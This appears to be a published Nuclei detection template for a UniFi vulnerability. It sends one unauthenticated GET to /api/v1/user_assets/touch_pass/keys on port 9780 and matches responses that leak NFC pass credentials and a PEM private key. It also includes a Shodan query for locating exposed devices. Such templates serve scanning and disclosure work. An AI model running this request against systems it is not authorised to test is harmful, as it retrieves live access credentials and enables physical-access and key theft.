An unauthenticated GET to /api/v1/user_assets/touch_pass/keys returns JSON containing live credential material (PEM private key, Apple NFC/express key values, terminal type, TTL, google_pass_auth_key block, version identifiers) over a publicly reachable port — allowing theft and immediate misuse of mobile/NFC access credentials.
PoC代码[已公开]
id: unifi-nfc-credentials
info:
name: UniFi - NFC Credentials
author: DhiyaneshDk
severity: high
description: |
An unauthenticated GET to /api/v1/user_assets/touch_pass/keys returns JSON containing live credential material (PEM private key, Apple NFC/express key values, terminal type, TTL, google_pass_auth_key block, version identifiers) over a publicly reachable port — allowing theft and immediate misuse of mobile/NFC access credentials.
reference:
- https://www.catchify.sa/post/cve-2025-52665-rce-in-unifi-os-25-000
metadata:
verified: true
max-request: 1
shodan-query: html:"UniFi Dream Machine SE"
tags: unifi,unauth,vuln
http:
- raw:
- |
@Host: {{Hostname}}:9780
GET /api/v1/user_assets/touch_pass/keys HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_any(body,"google_pass_auth_key","apple_nfc")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4b0a0048304602210085dd8aa45ee613b26b0d84ef99f92477472cbaa8ee406075f0d78189126b79f00221009228d47e2dcb58dadde9fb45fe0d554c1b5f41ebcaf971f7036280c98b9f569f:922c64590222798bb761d5b6d8e72950